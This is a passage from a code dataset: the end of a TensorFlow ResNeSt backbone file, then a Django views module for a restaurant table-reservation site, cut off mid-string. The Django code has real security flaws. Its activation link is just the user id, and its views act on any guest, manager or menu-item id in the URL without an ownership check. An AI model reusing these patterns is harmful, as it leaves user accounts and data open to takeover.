data_format=\"channels_last\")(\n short_cut\n )\n else:\n short_cut = AveragePooling2D(pool_size=1, strides=1, padding=\"same\", data_format=\"channels_last\")(short_cut)\n short_cut = Conv2D(filters, kernel_size=1, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(short_cut)\n else:\n short_cut = Conv2D(filters, kernel_size=1, strides=stride, padding=\"same\", kernel_initializer=\"he_normal\",\n use_bias=False, data_format=\"channels_last\")(short_cut)\n\n group_width = int(filters * (self.bottleneck_width / 64.0)) * self.cardinality\n avd = avd and (stride > 1 or is_first)\n avd_first = avd_first\n\n if avd:\n avd_layer = AveragePooling2D(pool_size=3, strides=stride, padding=\"same\", data_format=\"channels_last\")\n stride = 1\n\n if avd and avd_first:\n x = avd_layer(x)\n\n if radix >= 1:\n x = self._SplAtConv2d(x, filters=group_width, kernel_size=3, stride=stride, dilation=self.dilation,\n groups=self.cardinality, radix=radix)\n else:\n x = Conv2D(filters, kernel_size=3, strides=stride, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n\n if avd and not avd_first:\n x = avd_layer(x)\n # print('can')\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n x = Conv2D(filters, kernel_size=3, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n m2 = Add()([x, short_cut])\n return m2\n\n def _make_layer(self, input_tensor, blocks=4, filters=64, stride=2, is_first=True):\n x = input_tensor\n if self.using_basic_block is True:\n x = self._make_block_basic(x, first_block=True, filters=filters, stride=stride, radix=self.radix,\n avd=self.avd, avd_first=self.avd_first, is_first=is_first)\n # print('0',x.shape)\n\n for i in range(1, blocks):\n x = self._make_block_basic(\n x, first_block=False, filters=filters, stride=1, radix=self.radix, avd=self.avd, avd_first=self.avd_first\n )\n # print(i,x.shape)\n\n elif self.using_basic_block is False:\n x = self._make_block(x, first_block=True, filters=filters, stride=stride, radix=self.radix, avd=self.avd,\n avd_first=self.avd_first, is_first=is_first)\n # print('0',x.shape)\n\n for i in range(1, blocks):\n x = self._make_block(\n x, first_block=False, filters=filters, stride=1, radix=self.radix, avd=self.avd, avd_first=self.avd_first\n )\n # print(i,x.shape)\n return x\n\n def _make_Composite_layer(self,input_tensor,filters=256,kernel_size=1,stride=1,upsample=True):\n x = input_tensor\n x = Conv2D(filters, kernel_size, strides=stride, use_bias=False)(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n if upsample:\n x = UpSampling2D(size=2)(x)\n return x\n \n def get_config(self):\n return {\n 'model_id': self.model_id,\n 'blocks_set': self.blocks_set,\n 'stem_width': self.stem_width,\n 'deep_stem': self.deep_stem,\n 'activation': self.activation,\n 'dropout_rate': self.dropout_rate,\n \n 'radix': self.radix,\n 'cardinality': self.cardinality,\n 'bottleneck_width': self.bottleneck_width,\n 'block_expansion': self.block_expansion,\n 'avg_down': self.avg_down,\n 'avd': self.avd,\n 'avd_first': self.avd_first,\n\n 'dilation': self.dilation,\n 'preact': self.preact,\n 'using_basic_block': self.using_basic_block,\n 'using_cb': self.using_cb\n }\n \n @classmethod\n def from_config(cls, config, custom_objects=None):\n return 
cls(**config)\n\n @property\n def output_specs(self):\n \"\"\"A dict of {level: TensorShape} pairs for the model output.\"\"\"\n return self._output_specs\n\n\n@factory.register_backbone_builder('resnest')\ndef build_resnest(\n input_specs: tf.keras.layers.InputSpec,\n backbone_config: hyperparams.Config,\n norm_activation_config: hyperparams.Config,\n l2_regularizer: tf.keras.regularizers.Regularizer = None) -> tf.keras.Model:\n \"\"\"Builds ResNest backbone from a config.\"\"\"\n backbone_type = backbone_config.type\n backbone_cfg = backbone_config.get()\n assert backbone_type == 'resnest', (f'Inconsistent backbone type '\n f'{backbone_type}')\n\n return ResNest(\n model_id=backbone_cfg.model_id,\n input_specs=input_specs,\n stem_type=backbone_cfg.stem_type,\n activation=norm_activation_config.activation)\n # see resnet example to see more configurable options to add\n","sub_path":"official/vision/beta/modeling/backbones/resnest.py","file_name":"resnest.py","file_ext":"py","file_size_in_byte":18679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"535513350","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\n#from django.core.urlresolvers import reverse\n\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Guest, Manager, Table, MenuItem, Restaurant, Visit, Reservation, Friendship, ReservedTables\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom datetime import datetime as dt\nimport datetime\nimport pytz\nfrom django.db import transaction\n\nfrom django.conf import settings\nfrom .forms import contactForm\nfrom . 
import autoreply\n\n# Homepage\ndef index(request):\n return render(request, 'restaurant/index.html')\n# About Us page\ndef about(request):\n return render(request, 'restaurant/about.html')\n\n# User login\ndef login(request):\n if request.method == 'POST':\n # collecting form data\n username = request.POST.get('username')\n password = request.POST.get('password')\n # checking for user first\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n # check whether the user is a guest or a manager\n # search for guest\n guest = Guest.objects.all()\n for g in guest:\n if g.user == user:\n auth_login(request, user)\n return HttpResponseRedirect(reverse('restaurant:guest', args=(g.id,)))\n # search for manager\n managers = Manager.objects.all()\n for m in managers:\n if m.user == user:\n auth_login(request, user)\n return HttpResponseRedirect(reverse('restaurant:manager', args=(m.id,)))\n else:\n return render(request, 'restaurant/index.html', {\n 'error_message': \"Account is not activated!\"\n })\n else:\n return render(request, 'restaurant/index.html', {\n 'error_message': \"Wrong Email address or Password!\"\n })\n\ndef contact(request):\n \"\"\"Contact page\"\"\"\n title = \"Contact\"\n form = contactForm(request.POST or None) #form handling by view.\n confirmation = None\n\n if form.is_valid():\n user_name = form.cleaned_data['Username']\n user_message = form.cleaned_data['Message']\n emailsub = user_name + \" tried contacting you on Restaurant Table Reservation.\"\n emailFrom = form.cleaned_data['UserEmail']\n emailmessage = '%s %s user email: %s' %(user_message, user_name, emailFrom)\n emailTo = [settings.EMAIL_HOST_USER]\n send_mail(emailsub, emailmessage, emailFrom, list(emailTo), fail_silently=True)\n #Autoreply.\n autoreply.autoreply(emailFrom)\n title = \"Thanks.\"\n confirmation = \"We will get right back to you.\"\n form = None\n\n context = {'title':title, 'form':form, 'confirmation':confirmation,}\n template = 'contact.html'\n return render(request,'restaurant/contact.html',context)\n\n# User logout\ndef logout(request):\n auth_logout(request)\n return HttpResponseRedirect(reverse('restaurant:index'))\n\n\n# User register form\ndef register(request):\n return render(request, 'restaurant/register.html')\n\n\ndef registration(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n # check password equality\n if password1 == password2:\n users = User.objects.all()\n for u in users:\n if u.username == username:\n return render(request, 'restaurant/register.html', context={\n 'error_message': \"User already exists!\"\n })\n # user does not exist, create new\n new_user = User.objects.create_user(username, username, password1)\n new_user.is_staff = False\n new_user.is_active = False\n new_user.is_superuser = False\n new_user.save()\n # create activation link\n new_user_id = str(new_user.id)\n link = \"http://127.0.0.1:8000/restaurant/activation/\"+new_user_id+\"/\"\n message_text = \"Click on the following link to complete your registration\\n\\n\" + link\n # sending email\n send_mail('Restaurant - Profile Activation', message_text, 'subbusubramani1995@gmail.com', [new_user.username],\n fail_silently=False)\n # creating guest object\n new_guest = Guest.objects.create(user=new_user)\n new_user.save()\n print(\"Successful! 
Guest inserted: \" + str(new_guest))\n\n # back on page\n return render(request, 'restaurant/register.html', context={\n 'info_message': \"Account created successfully. Email with activation link was sent!\"\n })\n else:\n return render(request, 'restaurant/register.html', context={\n 'error_message': \"Password wasn't repeated correctly!\"\n })\n\n\n# User activation\ndef activation(request, user_id):\n user = get_object_or_404(User, pk=user_id)\n if user is not None:\n user.is_active = True\n user.save()\n return render(request, 'restaurant/index.html', context={\n 'info_message': \"Account successfully activated!\"\n })\n else:\n return render(request, 'restaurant/index.html', context={\n 'error_message': \"Error with activation link!\"\n })\n\n\n\"\"\"Manager pages\"\"\"\n\n# Manager's default page\n@login_required(login_url='/')\ndef manager(request, manager_id):\n this_manager = get_object_or_404(Manager, pk=manager_id)\n restaurant = this_manager.restaurant\n restaurant_tables = Table.objects.filter(restaurant=restaurant)\n rows = range(1, restaurant.rows+1)\n cols = range(1, restaurant.columns+1)\n return render(request, 'restaurant/manager.html', {\n 'manager': this_manager,\n 'restaurant': restaurant,\n 'tables': restaurant_tables,\n 'rows': rows,\n 'columns': cols\n })\n\n\n# Manager's profile page\n@login_required(login_url='/')\ndef profiling(request, manager_id):\n this_manager = get_object_or_404(Manager, pk=manager_id)\n return render(request, 'restaurant/manager_profile.html', {\n 'manager': this_manager\n })\n\n\n# Update Manager's profile\n@login_required(login_url='/')\ndef updating(request, manager_id):\n this_manager = get_object_or_404(Manager, pk=manager_id)\n if request.method == 'POST':\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n if password1 == password2:\n first_name = request.POST.get('first_name')\n last_name = request.POST.get('last_name')\n updated_manager = Manager.objects.get(pk=manager_id)\n # update profile\n updated_user = updated_manager.user\n updated_user.first_name = first_name\n updated_user.last_name = last_name\n updated_user.save()\n # update password if changed\n if password1 != '':\n updated_user.set_password(password1)\n updated_user.save()\n print(\"Success! 
Updated Manager: \" + str(updated_manager))\n return HttpResponseRedirect(reverse('restaurant:profiling', args=(manager_id, )))\n else:\n return render(request, 'restaurant/manager_profile.html', context={\n 'manager': this_manager,\n 'error_message': \"New password wasn't repeated correctly!\"\n })\n\n\n# Manager's page for menu setting\n@login_required(login_url='/')\ndef menu(request, restaurant_id, manager_id):\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n menu_items = MenuItem.objects.filter(restaurant=this_restaurant)\n this_manager = Manager.objects.get(pk=manager_id)\n return render(request, 'restaurant/menu.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'menu': menu_items\n })\n\n\n# Deleting menu item from restaurant\n@login_required(login_url='/')\ndef remove(request, item_id, restaurant_id, manager_id):\n item = get_object_or_404(MenuItem, pk=item_id)\n item.delete()\n return HttpResponseRedirect(reverse('restaurant:menu', args=(restaurant_id, manager_id,)))\n\n\n# Insert menu item for restaurant\n@login_required(login_url='/')\ndef insert(request, restaurant_id, manager_id):\n if request.method == 'POST':\n name = request.POST.get('name')\n description = request.POST.get('description')\n price = float(request.POST.get('price'))\n this_restaurant = Restaurant.objects.get(pk=restaurant_id)\n\n mi = MenuItem.objects.create(name=name, description=description, price=price, restaurant=this_restaurant)\n mi.save()\n print(\"Success. Inserted MenuItem: \" + str(mi))\n\n return HttpResponseRedirect(reverse('restaurant:menu', args=(restaurant_id, manager_id,)))\n\n\n# show edit menu item for restaurant\n@login_required(login_url='/')\ndef edit(request, item_id, restaurant_id, manager_id):\n this_item = get_object_or_404(MenuItem, pk=item_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_manager = get_object_or_404(Manager, pk=manager_id)\n menu_items = MenuItem.objects.filter(restaurant=this_restaurant)\n return render(request, 'restaurant/menuedit.html', context={\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'menu': menu_items,\n 'edition': this_item\n })\n\n# save edited data\n@login_required(login_url='')\ndef saveedition(request, item_id, restaurant_id, manager_id):\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_manager = get_object_or_404(Manager, pk=manager_id)\n this_item = get_object_or_404(MenuItem, pk=item_id)\n if request.method == 'POST':\n name = request.POST.get('name')\n description = request.POST.get('description')\n price = float(request.POST.get('price'))\n edit_item = MenuItem.objects.get(pk=item_id)\n edit_item.name = name\n edit_item.description = description\n edit_item.price = price\n edit_item.save()\n print(\"Success! 
Edited MenuItem: \" + str(edit_item))\n return HttpResponseRedirect(reverse('restaurant:menu', args=(restaurant_id, manager_id, )))\n\n\n# class for sitting schedule setting\nclass Place:\n def __init__(self, row, column, name):\n self.row = row\n self.column = column\n self.name = name\n\n\n# Setting sitting schedule\n@login_required(login_url='/')\ndef tables(request, restaurant_id, manager_id):\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n if this_restaurant.is_ready:\n return HttpResponseRedirect(reverse('restaurant:manager', args=(manager_id,)))\n else:\n rows = range(1, this_restaurant.rows+1)\n cols = range(1, this_restaurant.columns+1)\n places = []\n for i in rows:\n for j in cols:\n name = (i-1)*this_restaurant.columns + j\n places.append(Place(i, j, name))\n max_tables = this_restaurant.tables\n this_manager = Manager.objects.get(pk=manager_id)\n return render(request, 'restaurant/tables.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'rows': rows,\n 'columns': cols,\n 'tables': max_tables,\n 'places': places\n })\n\n\n# Setup table schedule\n@login_required(login_url='/')\ndef setup(request, restaurant_id, manager_id):\n # prepare data for going back\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_manager = get_object_or_404(Manager, pk=manager_id)\n r_rows = range(1, this_restaurant.rows+1)\n r_cols = range(1, this_restaurant.columns+1)\n r_places = []\n for i in r_rows:\n for j in r_cols:\n r_name = (i-1)*this_restaurant.columns + j\n r_places.append(Place(i, j, r_name))\n\n if this_restaurant.is_ready:\n return HttpResponseRedirect(reverse('restaurant:manager', args=(manager_id,)))\n else:\n rows = range(1, this_restaurant.rows+1)\n cols = range(1, this_restaurant.columns+1)\n places = range(1, this_restaurant.tables+1)\n tables_order = []\n tables_numbers = []\n if request.method == 'POST':\n for p in r_places:\n table_name = request.POST.get(str(p.name))\n # if inserted\n if table_name != '':\n table_num = int(table_name)\n # check for repeat\n if table_num in tables_numbers:\n message = \"Please set \" + str(this_restaurant.tables) + \" different tables!\"\n return render(request, 'restaurant/tables.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'rows': r_rows,\n 'columns': r_cols,\n 'tables': this_restaurant.tables,\n 'places': r_places,\n 'error_message': message\n })\n else:\n r = p.row\n c = p.column\n tables_order.append(Place(r, c, table_num))\n tables_numbers.append(table_num)\n # check for number of tables\n if len(tables_order) == this_restaurant.tables:\n # before inserting tables, see for duplicates\n\n # inserting tables\n for t in range(0, len(tables_order)):\n r = tables_order[t].row\n c = tables_order[t].column\n n = tables_order[t].name\n # inserting table\n new_table = Table.objects.create(number=n, row=r, column=c, currently_free=True,\n restaurant=this_restaurant)\n new_table.save()\n print(\"Success. Inserted Table: \" + str(new_table))\n # restaurant is now ready\n update_restaurant = Restaurant.objects.get(pk=restaurant_id)\n update_restaurant.is_ready = True\n update_restaurant.save()\n print(\"Success. 
Updated Restaurant: \" + str(update_restaurant))\n return HttpResponseRedirect(reverse('restaurant:manager', args=(manager_id,)))\n else:\n message = \"Please set \" + str(this_restaurant.tables) + \" tables!\"\n return render(request, 'restaurant/tables.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'rows': r_rows,\n 'columns': r_cols,\n 'tables': this_restaurant.tables,\n 'places': r_places,\n 'error_message': message\n })\n\n\n\"\"\"User pages\"\"\"\n\n# Guest's default page\n@login_required(login_url='/')\ndef guest(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n right_now = timezone.now()\n visits = Visit.objects.filter(guest=this_guest).filter(confirmed=True).filter(ending_time__lte=right_now)\n return render(request, 'restaurant/guest.html', context={\n 'guest': this_guest,\n 'visits': visits\n })\n\n\n# Rating visit view\n@login_required(login_url='/')\ndef rate(request, guest_id, visit_id):\n this_visit = get_object_or_404(Visit, pk=visit_id)\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservation = this_visit.reservation\n # searching for friends visits\n friends_visits = Visit.objects.filter(reservation=this_reservation).filter(confirmed=True).exclude(guest=this_guest)\n count = len(friends_visits)\n # show page\n return render(request, 'restaurant/rating.html', context={\n 'guest': this_guest,\n 'visit': this_visit,\n 'friends': friends_visits,\n 'count': count\n })\n\n# Process rate\n@login_required(login_url='/')\ndef rating(request, guest_id, visit_id):\n if request.method == 'POST':\n this_rating = int(request.POST.get('rating'))\n this_visit = Visit.objects.get(pk=visit_id)\n this_visit.grade = this_rating\n this_visit.save()\n print(\"Success! Rated: \" + str(this_visit))\n return HttpResponseRedirect(reverse('restaurant:guest', args=(guest_id, )))\n\n\n# User friends\n@login_required(login_url='/')\ndef friends(request, guest_id):\n # search for friendships where guest is user\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # get number of friends\n friends_list = get_friends_list(this_guest)\n # calculate number of visits for every friend\n number_of_visits = []\n right_now = timezone.now()\n for ff in friends_list:\n number = len(Visit.objects.filter(guest=ff).filter(confirmed=True).filter(ending_time__lte=right_now))\n number_of_visits.append(number)\n friends_send = zip(friends_list, number_of_visits)\n return render(request, 'restaurant/friends.html', context={\n 'guest': this_guest,\n 'friends': friends_send\n })\n\n\n# Search for friends\n@login_required(login_url='/')\ndef search(request, guest_id):\n # find user\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # select other users\n all_guests = Guest.objects.all().exclude(pk=guest_id)\n # find list of friends\n friends_list = get_friends_list(this_guest)\n # users for rendering\n if request.method == 'POST':\n query = request.POST.get('name').lower()\n render_users = []\n for g in all_guests:\n if g not in friends_list:\n # search for name and surname\n if (query in g.user.first_name.lower()) or (query in g.user.last_name.lower()):\n render_users.append(g)\n # prepare data for resend\n number_of_visits = []\n right_now = timezone.now()\n for ff in friends_list:\n number = len(Visit.objects.filter(guest=ff).filter(confirmed=True).filter(ending_time__lte=right_now))\n number_of_visits.append(number)\n friends_send = zip(friends_list, number_of_visits)\n if len(render_users) == 0:\n return render(request, 'restaurant/friends.html', 
context={\n 'guest': this_guest,\n 'friends': friends_send,\n 'error_message': \"No Users with given First Name and/or Last Name!\"\n })\n else:\n return render(request, 'restaurant/friends.html', context={\n 'guest': this_guest,\n 'friends': friends_send,\n 'connections': render_users\n })\n\n\n# Make new friendship\n@login_required(login_url='/')\ndef connect(request, guest_id, connection_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n new_friend = get_object_or_404(Guest, pk=connection_id)\n new_friendship = Friendship.objects.create(user=this_guest, friend=new_friend)\n new_friendship.save()\n print(\"Success! New Friendship: \" + str(new_friendship))\n return HttpResponseRedirect(reverse('restaurant:friends', args=(guest_id, )))\n\n\n# Remove friend\n@login_required(login_url='/')\ndef disconnect(request, guest_id, friend_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_friend = get_object_or_404(Guest, pk=friend_id)\n # first search friendships where guest is user\n user_friendship = Friendship.objects.filter(user=this_guest)\n for f in user_friendship:\n if f.friend == this_friend:\n f.delete()\n print(\"Success! Friendship deleted!\")\n return HttpResponseRedirect(reverse('restaurant:friends', args=(guest_id, )))\n # now search friendships where guest is friend\n friend_friendship = Friendship.objects.filter(friend=this_guest)\n for f in friend_friendship:\n if f.user == this_friend:\n f.delete()\n print(\"Success! Friendship deleted!\")\n return HttpResponseRedirect(reverse('restaurant:friends', args=(guest_id, )))\n\n# User profile\n@login_required(login_url='/')\ndef profile(request, guest_id):\n # search for guest\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # get friends\n friends_list = get_friends_list(this_guest)\n # show\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list\n })\n\n# Update User profile info\n@login_required(login_url='/')\ndef update(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n if request.method == 'POST':\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n if password1 == password2:\n first_name = request.POST.get('first_name')\n last_name = request.POST.get('last_name')\n address = request.POST.get('address')\n updated_guest = Guest.objects.get(pk=guest_id)\n updated_guest.address = address\n updated_guest.save()\n print(\"Success! Updated Guest: \" + str(updated_guest))\n # update profile\n updated_user = updated_guest.user\n updated_user.first_name = first_name\n updated_user.last_name = last_name\n updated_user.save()\n # update password if changed\n if password1 != '':\n updated_user.set_password(password1)\n updated_user.save()\n print(\"Success! 
Updated User: \" + str(updated_user))\n return HttpResponseRedirect(reverse('restaurant:profile', args=(guest_id, )))\n else:\n friends_list = get_friends_list(this_guest)\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list,\n 'error_message': \"New password wasn't repeated correctly!\"\n })\n\n\n# Searching for friends on profile page\n@login_required(login_url='/')\ndef searching(request, guest_id):\n # find user\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # select other users\n all_guests = Guest.objects.all().exclude(pk=guest_id)\n # find list of friends\n friends_list = get_friends_list(this_guest)\n # users for rendering\n if request.method == 'POST':\n query = request.POST.get('name').lower()\n render_users = []\n for g in all_guests:\n if g not in friends_list:\n # search for name and surname\n if query in g.user.first_name.lower() or query in g.user.last_name.lower():\n render_users.append(g)\n # prepare data for resend\n if len(render_users) == 0:\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list,\n 'search_error': \"No Users with given First Name and/or Last Name!\"\n })\n else:\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list,\n 'connections': render_users\n })\n\n\n# get list of friends for given guest\ndef get_friends_list(this_guest):\n friendship_user = Friendship.objects.filter(user=this_guest)\n friendship_friend = Friendship.objects.filter(friend=this_guest)\n friends_list = []\n # selecting friends - friend\n for f in friendship_user:\n friend = f.friend\n if friend not in friends_list:\n friends_list.append(friend)\n # selecting friends - user\n for f in friendship_friend:\n friend = f.user\n if friend not in friends_list:\n friends_list.append(friend)\n return friends_list\n\n\n# Display restaurant list with ratings\n@login_required(login_url='/')\ndef restaurantlist(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n restaurants = Restaurant.objects.filter(is_ready=True)\n restaurant_rate = []\n restaurant_friend_rate = []\n for r in restaurants:\n restaurant_rate.append(get_restaurant_rating(r))\n restaurant_friend_rate.append(get_restaurants_friends_rating(r, this_guest))\n restaurants_send = zip(restaurants, restaurant_rate, restaurant_friend_rate)\n return render(request, 'restaurant/restaurants_list.html', context={\n 'guest': this_guest,\n 'restaurants': restaurants_send\n })\n\n\n# calculates restaurant's rating\ndef get_restaurant_rating(this_restaurant):\n list_of_visits = Visit.objects.filter(confirmed=True)\n s = 0\n c = 0\n for v in list_of_visits:\n if v.reservation.restaurant == this_restaurant:\n if v.grade is not None and v.grade >= 1:\n s += v.grade\n c += 1\n if c == 0:\n return 0\n else:\n r = s/c\n return round(r, 2)\n\n\n# calculates restaurant's friends rating\ndef get_restaurants_friends_rating(this_restaurant, this_guest):\n guest_friends = get_friends_list(this_guest)\n all_visits = Visit.objects.filter(confirmed=True)\n list_of_visits = []\n for v in all_visits:\n if v.guest in guest_friends or v.guest == this_guest:\n list_of_visits.append(v)\n s = 0\n c = 0\n for v in list_of_visits:\n if v.reservation.restaurant == this_restaurant:\n if v.grade is not None and v.grade >= 1:\n s += v.grade\n c += 1\n if c == 0:\n return 0\n else:\n r = s/c\n return round(r, 2)\n\n\n# shows restaurant's profile with 
menu\n@login_required(login_url='/')\ndef restaurantmenu(request, guest_id, restaurant_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n menu_items = MenuItem.objects.filter(restaurant=this_restaurant)\n return render(request, 'restaurant/restaurant_menu.html', context={\n 'restaurant': this_restaurant,\n 'guest': this_guest,\n 'items': menu_items\n })\n\n\n# shows history of guest's reservations\n@login_required(login_url='/')\ndef myreservations(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservations = Reservation.objects.filter(guest=this_guest)\n return render(request, 'restaurant/my_reservations.html', context={\n 'guest': this_guest,\n 'reservations': this_reservations\n })\n\n\n# reservation time\n@login_required(login_url='/')\ndef reservationtime(request, guest_id, restaurant_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant\n })\n\n\n# setup reservation\n@login_required(login_url='/')\ndef makereservation(request, guest_id, restaurant_id):\n # find guest and restaurant\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n # find all reservations for given restaurant\n all_reservations = Reservation.objects.filter(restaurant=this_restaurant)\n # process form\n if request.method == 'POST':\n # get date from form\n date_time = request.POST.get('datetime')\n if date_time == '':\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"Please insert Date and Time\"\n })\n coming = dt.strptime(date_time, '%d-%b-%Y %H:%M:%S')\n # localize to my timezone\n coming_time = pytz.utc.localize(coming)\n # time for comparison\n right_now = timezone.now()\n if coming_time < right_now:\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"It's impossible to reserve in the past!\"\n })\n else:\n # get duration time\n duration = int(request.POST.get('duration'))\n # calculate ending time\n ending_time = coming_time + datetime.timedelta(hours=duration)\n # filter reservations with same time like new reservation\n taken_tables = 0\n for r in all_reservations:\n if are_overlap(coming_time, ending_time, r):\n taken_tables += get_tables_from_reservation(r)\n if taken_tables == this_restaurant.tables:\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"No available tables for given reservation period!\"\n })\n else:\n # get all restaurant tables\n all_restaurant_tables = Table.objects.filter(restaurant=this_restaurant)\n # get reserved tables\n all_reserved_tables = []\n for r in all_reservations:\n if are_overlap(coming_time, ending_time, r):\n rt = reserved_tables_from_reservation(r)\n if rt is not None:\n for rrtt in rt:\n all_reserved_tables.append(rrtt)\n # check if table is reserved or not\n for single_table in all_restaurant_tables:\n if single_table in all_reserved_tables:\n single_table.currently_free = False\n single_table.save()\n else:\n single_table.currently_free = True\n single_table.save()\n # tables are ready\n rows = range(1, 
this_restaurant.rows+1)\n columns = range(1, this_restaurant.columns+1)\n # create new reservation object\n new_reservation = Reservation.objects.create(coming=coming_time, duration=duration, guest=this_guest,\n restaurant=this_restaurant)\n new_reservation.save()\n print(\"Success! Created Reservation: \" + str(new_reservation))\n created_reservation = Reservation.objects.get(pk=new_reservation.id)\n render_tables = Table.objects.filter(restaurant=this_restaurant)\n return render(request, 'restaurant/reservation_tables.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'reservation': created_reservation,\n 'tables': render_tables,\n 'rows': rows,\n 'columns': columns\n })\n\n\n# check if two reservation periods overlap\ndef are_overlap(coming_time, ending_time, this_reservation):\n reservation_start = this_reservation.coming\n reservation_end = this_reservation.get_finishing_time()\n # the periods overlap if either endpoint of one period falls inside the other\n return (coming_time <= reservation_start <= ending_time\n or coming_time <= reservation_end <= ending_time\n or reservation_start <= coming_time <= reservation_end\n or reservation_start <= ending_time <= reservation_end)\n\n\n# get number of tables from reservation\ndef get_tables_from_reservation(this_reservation):\n reserved_tables = ReservedTables.objects.filter(reservation=this_reservation)\n if reserved_tables is not None:\n return len(reserved_tables)\n else:\n return 0\n\n\n# get table object from reservation\ndef reserved_tables_from_reservation(this_reservation):\n rt = ReservedTables.objects.filter(reservation=this_reservation)\n if rt is not None:\n ret_val = []\n for r in rt:\n ret_val.append(r.table)\n return ret_val\n else:\n return None\n\n\n# reserving tables\n@login_required(login_url='/')\n@transaction.atomic\ndef reservetables(request, guest_id, restaurant_id, reservation_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n this_tables = Table.objects.filter(restaurant=this_restaurant)\n selected_tables = []\n if request.method == 'POST':\n for t in this_tables:\n if request.POST.get(str(t.id)):\n selected_tables.append(t)\n if len(selected_tables) == 0:\n delete_reservation = Reservation.objects.get(pk=reservation_id)\n delete_reservation.delete()\n print(\"Deleted Reservation!!!\")\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"Unsuccessful Reservation! Tables weren't selected!\"\n })\n # try to reserve tables\n try:\n with transaction.atomic():\n for t in selected_tables:\n reserve_new_table = ReservedTables.objects.create(reservation=this_reservation, table=t)\n reserve_new_table.save()\n print(\"Success! Reserved table: \" + str(t))\n # someone reserved the table in the meantime\n except Exception:\n delete_reservation = Reservation.objects.get(pk=reservation_id)\n delete_reservation.delete()\n print(\"Deleted Reservation!!!\")\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"Unsuccessful Reservation! 
